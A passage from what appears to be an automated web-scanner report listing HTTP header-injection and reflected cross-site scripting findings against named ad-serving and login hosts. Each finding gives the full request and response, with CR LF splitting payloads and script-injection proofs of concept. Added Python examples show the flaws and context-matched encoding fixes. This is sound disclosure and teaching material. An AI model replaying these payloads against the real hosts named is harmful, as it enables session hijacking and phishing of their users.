Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=2882&BWDate=40640.944213&debuglevel=&FLV=29793
6b9998c57bd
&RES=128&WMPV=0; expires=Fri, 15-Jul-2011 10: 03:34 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 16 Apr 2011 14:03:33 GMT
Connection: close
Content-Length: 0
3.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 81b10%0d%0a85657bf67be was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=2190691~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.9050657076295465&flv=10.2154&wmpv=0&res=81b10%0d%0a85657bf67be HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.reed-elsevier.com/Pages/Home.aspx
Origin: http://www.reed-elsevier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=FLV=10.2154&RES=81b10
85657bf67be
&WMPV=0; expires=Fri, 15-Jul-2011 10:03:35 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 16 Apr 2011 14:03:34 GMT
Connection: close
Content-Length: 0


3.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header without filtering or encoding. The payload e1587%0d%0a37fed39d5c (two marker strings separated by a URL-encoded CR LF) was submitted in the wmpv parameter. In the response below the text after the CR LF, 37fed39d5c, begins a new line in the header block, so the Set-Cookie header is terminated early and the remainder is parsed as a separate header line: an attacker who controls wmpv can inject arbitrary HTTP response headers.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=2190691~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.9050657076295465&flv=10.2154&wmpv=e1587%0d%0a37fed39d5c&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.reed-elsevier.com/Pages/Home.aspx
Origin: http://www.reed-elsevier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=FLV=10.2154&RES=128&WMPV=e1587
37fed39d5c
; expires=Fri, 15-Jul-2011 10:03:34 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 16 Apr 2011 14:03:34 GMT
Connection: close
Content-Length: 0


3.5. https://cc.dealer.com/views/login [reseller parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://cc.dealer.com
Path:   /views/login

Issue detail

The value of the reseller request parameter is copied into the Location response header without filtering or encoding. The payload 6bacb%0d%0a504c4ba8636 (two marker strings separated by a URL-encoded CR LF) was submitted in the reseller parameter. In the 302 response below the text after the CR LF, 504c4ba8636, begins a new line in the header block, so the redirect target is cut short and everything that follows is parsed as further header lines. The lang parameter in the same request shows the same behaviour: its value is echoed into Location and the CR LF it carries turns ns: netsparker056650=vuln into a header line of its own.

Request

GET /views/login?sessionTimedOut=true&action=Login&lang=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&password=3&reseller=6bacb%0d%0a504c4ba8636&storeCookie=storeCookie HTTP/1.1
Host: cc.dealer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerCC5Pool=2650869258.20480.0000; BIGipServerSecureCC5Pool=2650869258.20736.0000; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.59.10.1303002182

Response

HTTP/1.1 302 Moved Temporarily
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Location: http://cc.dealer.com/views/login?loginFailed=true&reseller=6bacb
504c4ba8636
&lang=http://example.com/?
ns: netsparker056650=vuln
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Sun, 17 Apr 2011 01:59:03 GMT
Connection: keep-alive
Set-Cookie: ssoid=612ebd1c404638d30061b29f0f23881f;path=/;domain=.dealer.com
Set-Cookie: ssoid=612ebd1c404638d30061b29f0f23881f;path=/;domain=.dealer.com;expires=Thu, 01 Jan 1970 00:00:00 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
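
The header splitting in 3.3, 3.4 and 3.5 comes down to one mistake: a decoded request parameter is pasted into a header value that the HTTP framing treats as terminated by CR LF. The following is an added example, not code from this report or from the ad server it describes. The cookie builders are hypothetical stand-ins that copy the observed eyeblaster cookie layout and domain from 3.3; the second payload, which injects a complete extra Set-Cookie line, is constructed for the example. The parser models what a lenient client sees, so the split is visible as header names rather than as a wrapped line in a report.

```python
# Added example (not from the XSS.CX report or the ad server): reproduces the
# Set-Cookie splitting in findings 3.3-3.5 with hypothetical builders and
# shows an RFC 6265 value check that rejects the payload outright.
from urllib.parse import unquote

# Payload from finding 3.3, exactly as it appeared in the res parameter.
PAYLOAD_RES = "81b10%0d%0a85657bf67be"
# Constructed variant: the same CR LF trick used to add a whole new header.
PAYLOAD_NEW_HEADER = "128%0d%0aSet-Cookie:%20injected=1"


def format_cookie_header(flv: str, res: str, wmpv: str) -> bytes:
    """Cookie layout and domain as seen in the 3.3 response."""
    value = f"eyeblaster=FLV={flv}&RES={res}&WMPV={wmpv}"
    return f"Set-Cookie: {value}; domain=bs.serving-sys.com; path=/\r\n".encode("latin-1")


def build_cookie_header_vulnerable(flv: str, res: str, wmpv: str) -> bytes:
    """Models the observed behaviour: decoded values are pasted in with no
    character filtering, so a CR LF inside `res` ends the header early."""
    return format_cookie_header(flv, res, wmpv)


def cookie_value_ok(v: str) -> bool:
    """RFC 6265 cookie-octet: printable US-ASCII minus space, DQUOTE, comma,
    semicolon and backslash. CR, LF and every other control byte fail."""
    return all(0x21 <= ord(c) <= 0x7E and c not in '",;\\' for c in v)


def build_cookie_header_hardened(flv: str, res: str, wmpv: str) -> bytes:
    """Same header, but every value must be a valid cookie-octet string.
    Reject rather than 'clean': stripping only CR LF leaves other delimiter
    characters (semicolon, comma) free to rewrite cookie attributes."""
    for name, v in (("flv", flv), ("res", res), ("wmpv", wmpv)):
        if not cookie_value_ok(v):
            raise ValueError(f"{name}: illegal byte in cookie value")
    return format_cookie_header(flv, res, wmpv)


def hardened_accepts(res: str) -> bool:
    """True if the hardened builder would emit a header for this res value."""
    try:
        build_cookie_header_hardened("10.2154", res, "0")
        return True
    except ValueError:
        return False


def response_for(res: str, builder) -> bytes:
    """Status line, cookie header and Content-Length: 0, like the report."""
    return b"HTTP/1.1 200 OK\r\n" + builder("10.2154", res, "0") + b"Content-Length: 0\r\n\r\n"


def parse_headers(raw: bytes) -> list:
    """Split the header block the way a lenient client does: one header per
    CR LF line. A line with no colon (the tail of a split Set-Cookie) comes
    back with an empty name so the damage is visible."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split(b"\r\n")[1:]:  # skip the status line
        name, sep, value = line.decode("latin-1").partition(":")
        pairs.append((name.strip().lower(), value.strip()) if sep else ("", name))
    return pairs


def header_names(res_param: str, builder) -> list:
    """Header names a client records for a raw (still URL-encoded) res value."""
    return [n for n, _ in parse_headers(response_for(unquote(res_param), builder))]


if __name__ == "__main__":
    print(header_names(PAYLOAD_RES, build_cookie_header_vulnerable))
    print(header_names(PAYLOAD_NEW_HEADER, build_cookie_header_vulnerable))
    print(hardened_accepts(unquote(PAYLOAD_RES)), hardened_accepts("128"))
```

With the vulnerable builder the 3.3 payload yields a header list of set-cookie, an unnamed orphan line, content-length, which is exactly the three-line rendering in the response above; the constructed payload yields two set-cookie headers. The hardened builder refuses both while still accepting the legitimate values seen in the report (10.2154, 128, 0). The same cookie-octet check is the right gate for the Location header in 3.5 too, with the additional rule that a redirect target should be validated as a URL rather than only scanned for control bytes.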


4. Cross-site scripting (reflected)
There are 327 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message, submit the link to popular web sites that allow content authoring (for example in blog comments), or create an innocuous-looking web site that causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.



4.1. http://ad.aggregateknowledge.com/iframe!t=624! [clk1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.aggregateknowledge.com
Path:   /iframe!t=624!

Issue detail

The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff22e"><script>alert(1)</script>ac12818f45c was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=624!?che=3157054&clk1=ff22e"><script>alert(1)</script>ac12818f45c HTTP/1.1
Host: ad.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.kirtsy.com/login.php?return=/submit.php?fc309%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ef2948ed7988=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=804427654888569294; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Fri, 15-Apr-2016 14:22:04 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0BAJaoN4AAAAAAAEAhgEAmQECiAEQAAEAhn46STejmrz8%2FgAAAAAAAAHTAAAAAAAAAogAAAAAAAAAmQAdAAA%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Tue, 16-Apr-2013 14:22:04 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:22:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="ff22e"><script>alert(1)</script>ac12818f45chttp://ad.aggregateknowledge.com/interaction!che=1936566067?imid=4199949303314971902&ipid=467&caid=134&cgid=153&crid=648&a=CLICK&adid=29&status=0&l=http://www.pantene.com/en-US/news-and-offers/Pages/sa
...[SNIP]...

4.2. http://ad.aggregateknowledge.com/iframe!t=624! [clk1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.aggregateknowledge.com
Path:   /iframe!t=624!

Issue detail

The value of the clk1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0834"%3balert(1)//2eb8545037b was submitted in the clk1 parameter. This input was echoed as a0834";alert(1)//2eb8545037b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=624!?che=3157054&clk1=a0834"%3balert(1)//2eb8545037b HTTP/1.1
Host: ad.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.kirtsy.com/login.php?return=/submit.php?fc309%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ef2948ed7988=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=933114531302223782; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Fri, 15-Apr-2016 14:22:04 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0BAJaoN4AAAAAAAEAhgEAmQECgwEQAAEAhn4dJA%2F%2FFdHHhAAAAAAAAAHTAAAAAAAAAoMAAAAAAAAAmQAdAAA%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Tue, 16-Apr-2013 14:22:04 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:22:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href=\"a0834";alert(1)//2eb8545037bhttp://ad.aggregateknowledge.com/interaction!che=1154063332?imid=2099820914518640516&ipid=467&caid=134&cgid=153&crid=643&a=CLICK&adid=29&status=0&l=http://www.pantene.com/en-US/news-and-offers/Pages/sa
...[SNIP]...
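
Findings 4.1 and 4.2 show the same parameter landing in two different syntactic contexts, an href attribute and a double-quoted JavaScript string, and each needs its own encoder: HTML entity encoding does nothing inside a script block, and JavaScript string escaping does nothing inside an attribute. The following is an added example, not code from this report or from the ad server. The two templates are hypothetical stand-ins modelled on the reflected snippets (the clk1 value prefixed to a click URL; the URL itself is a placeholder), and the payloads are the ones recorded in 4.1, 4.2 and 4.3. Each template is rendered unencoded and then with a context-matched encoder, and the result is checked with a parser rather than by eye.

```python
# Added example (not from the XSS.CX report or the ad server): replays the
# 4.1 / 4.2 / 4.3 payloads against hypothetical attribute and JS-string
# templates, unencoded and then with an encoder matched to each context.
import html
from html.parser import HTMLParser

ATTR_PAYLOAD = 'ff22e"><script>alert(1)</script>ac12818f45c'  # finding 4.1
JS_PAYLOAD = 'a0834";alert(1)//2eb8545037b'                   # finding 4.2, decoded
JS_PAYLOAD_2 = 'dff2d"-alert(1)-"c09d0074cf'                  # findings 4.3 onward

TARGET = "http://example.invalid/interaction"  # placeholder for the click URL


def render_link_vulnerable(clk1: str) -> str:
    """Attribute context with the value pasted in verbatim (finding 4.1)."""
    return f'<a href="{clk1}{TARGET}">ad</a>'


def render_link_hardened(clk1: str) -> str:
    """html.escape(quote=True) turns " into &quot; and < into &lt;, so the
    value can neither close the attribute nor open a new tag."""
    return f'<a href="{html.escape(clk1, quote=True)}{TARGET}">ad</a>'


def js_string_escape(s: str) -> str:
    """Hex-escape every character outside [A-Za-z0-9]. That covers the quote
    and backslash, and also < and / so a literal </script> cannot end the
    block; the browser decodes \\xHH inside the literal, so the runtime value
    is unchanged."""
    out = []
    for ch in s:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif ord(ch) < 0x100:
            out.append(f"\\x{ord(ch):02x}")
        else:
            out.append(f"\\u{ord(ch):04x}")
    return "".join(out)


def render_script_vulnerable(clk1: str) -> str:
    """JavaScript string context, value pasted in verbatim (finding 4.2)."""
    return f'var url = "{clk1}{TARGET}";'


def render_script_hardened(clk1: str) -> str:
    return f'var url = "{js_string_escape(clk1)}{TARGET}";'


def start_tags(markup: str) -> list:
    """Tag names Python's HTML parser sees; a value that broke out of the
    attribute shows up as an extra 'script'."""
    class Collector(HTMLParser):
        def __init__(self):
            super().__init__()
            self.tags = []

        def handle_starttag(self, tag, attrs):
            self.tags.append(tag)

    c = Collector()
    c.feed(markup)
    return c.tags


def js_tail_after_string(code: str) -> str:
    """What a JS tokenizer sees after the first double-quoted literal in
    `code`, honouring backslash escapes. For safe output this is the
    template's own ';' and nothing else."""
    i = code.index('"') + 1
    while i < len(code):
        if code[i] == "\\":
            i += 2
            continue
        if code[i] == '"':
            return code[i + 1:]
        i += 1
    return ""


if __name__ == "__main__":
    print(start_tags(render_link_vulnerable(ATTR_PAYLOAD)), start_tags(render_link_hardened(ATTR_PAYLOAD)))
    print(repr(js_tail_after_string(render_script_vulnerable(JS_PAYLOAD))))
    print(repr(js_tail_after_string(render_script_hardened(JS_PAYLOAD))))
```

The "-alert(1)-" form used from 4.3 onward is handled by the same JavaScript encoder; it differs from 4.2 only in how the injected code rejoins the string. One caveat the page's snippets make visible: in both findings the value is a prefix of a URL, so even with correct encoding a value such as javascript: followed by code would survive untouched. Output encoding stops the value from leaving its context; an allow-list on the URL scheme is still needed to make the context itself safe.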

4.3. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dff2d"-alert(1)-"c09d0074cf was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=dff2d"-alert(1)-"c09d0074cf HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6978
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 17 Apr 2011 15:01:46 GMT
Expires: Sun, 17 Apr 2011 15:01:46 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
QozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=dff2d"-alert(1)-"c09d0074cfhttp://turbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow =
...[SNIP]...
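
The "Issue detail" wording in 4.1, 4.2 and 4.3 ("copied into the value of an HTML tag attribute which is encapsulated in double quotation marks", "copied into a JavaScript string which is encapsulated in double quotation marks") is the scanner's classification of where the reflected marker landed, and it is what tells a tester which breakout sequence to try. The following is an added example, not code from this report or from the scanner that produced it. It locates the marker in a response body and derives the same context labels by scanning the markup before it: whether an unclosed script element encloses it, whether a string literal is still open there, and otherwise whether it sits inside a start tag with an attribute quote open. The sample bodies are constructed from the snippets in 4.1, 4.2 and 4.3 with placeholder URLs; the script wrapper around the 4.2 fragment is assumed, since the report's excerpt starts inside it.

```python
# Added example (not from the XSS.CX report or from Burp Suite): derives the
# reflection-context labels used in findings 4.1-4.3 from a response body.
import re
from typing import Optional

SCRIPT_OPEN = re.compile(r"<script\b[^>]*>", re.I)
SCRIPT_CLOSE = re.compile(r"</script\s*>", re.I)
QUOTE_NAME = {'"': "double", "'": "single"}


def open_quote(text: str, backslash_escapes: bool) -> Optional[str]:
    """Quote character of a string literal still open at the end of `text`,
    or None. JavaScript honours backslash escapes; HTML attributes do not."""
    q = None
    i = 0
    while i < len(text):
        c = text[i]
        if q:
            if backslash_escapes and c == "\\":
                i += 2
                continue
            if c == q:
                q = None
        elif c in "\"'":
            q = c
        i += 1
    return q


def classify_reflection(body: str, marker: str) -> str:
    """Name the syntactic context the first occurrence of `marker` lands in.
    Heuristic: it does not model HTML comments, CDATA or </script inside
    strings, which is enough for the snippets in this report."""
    pos = body.find(marker)
    if pos < 0:
        return "not reflected"
    before = body[:pos]
    opens = [m.end() for m in SCRIPT_OPEN.finditer(before)]
    closes = [m.start() for m in SCRIPT_CLOSE.finditer(before)]
    if len(opens) > len(closes):
        # Inside <script>: is a string literal still open at the marker?
        q = open_quote(before[opens[-1]:], backslash_escapes=True)
        return f"JavaScript string ({QUOTE_NAME[q]} quotes)" if q else "JavaScript code"
    lt, gt = before.rfind("<"), before.rfind(">")
    if lt > gt:
        # Inside a start tag: an unclosed quote means an open attribute value.
        q = open_quote(before[lt:], backslash_escapes=False)
        if q:
            return f"HTML attribute value ({QUOTE_NAME[q]} quotes)"
        return "HTML attribute value (unquoted)" if before.rstrip().endswith("=") else "inside HTML tag"
    return "HTML text"


# Constructed bodies modelled on the snippets in findings 4.1, 4.2 and 4.3.
MARKER_41 = 'ff22e"><script>alert(1)</script>ac12818f45c'
BODY_41 = f'<div><a href="{MARKER_41}http://ad.example/interaction">ad</a></div>'
MARKER_42 = 'a0834";alert(1)//2eb8545037b'
BODY_42 = f'<script>document.write("<a href=\\"{MARKER_42}http://ad.example/interaction\\">");</script>'
MARKER_43 = 'dff2d"-alert(1)-"c09d0074cf'
BODY_43 = f'<script>var url = escape("http://ad.example/click?adurl={MARKER_43}");</script>'

if __name__ == "__main__":
    for body, marker in ((BODY_41, MARKER_41), (BODY_42, MARKER_42), (BODY_43, MARKER_43)):
        print(classify_reflection(body, marker))
```

In practice a scanner searches for the random marker halves rather than the whole payload, because an application that encodes the output will have rewritten the quote in between; the classification logic is the same once the reflection point is found.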

4.4. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd9ac"-alert(1)-"804dc1ac7d6 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQcd9ac"-alert(1)-"804dc1ac7d6&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=;ord=552835799? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 17 Apr 2011 15:01:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7000

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
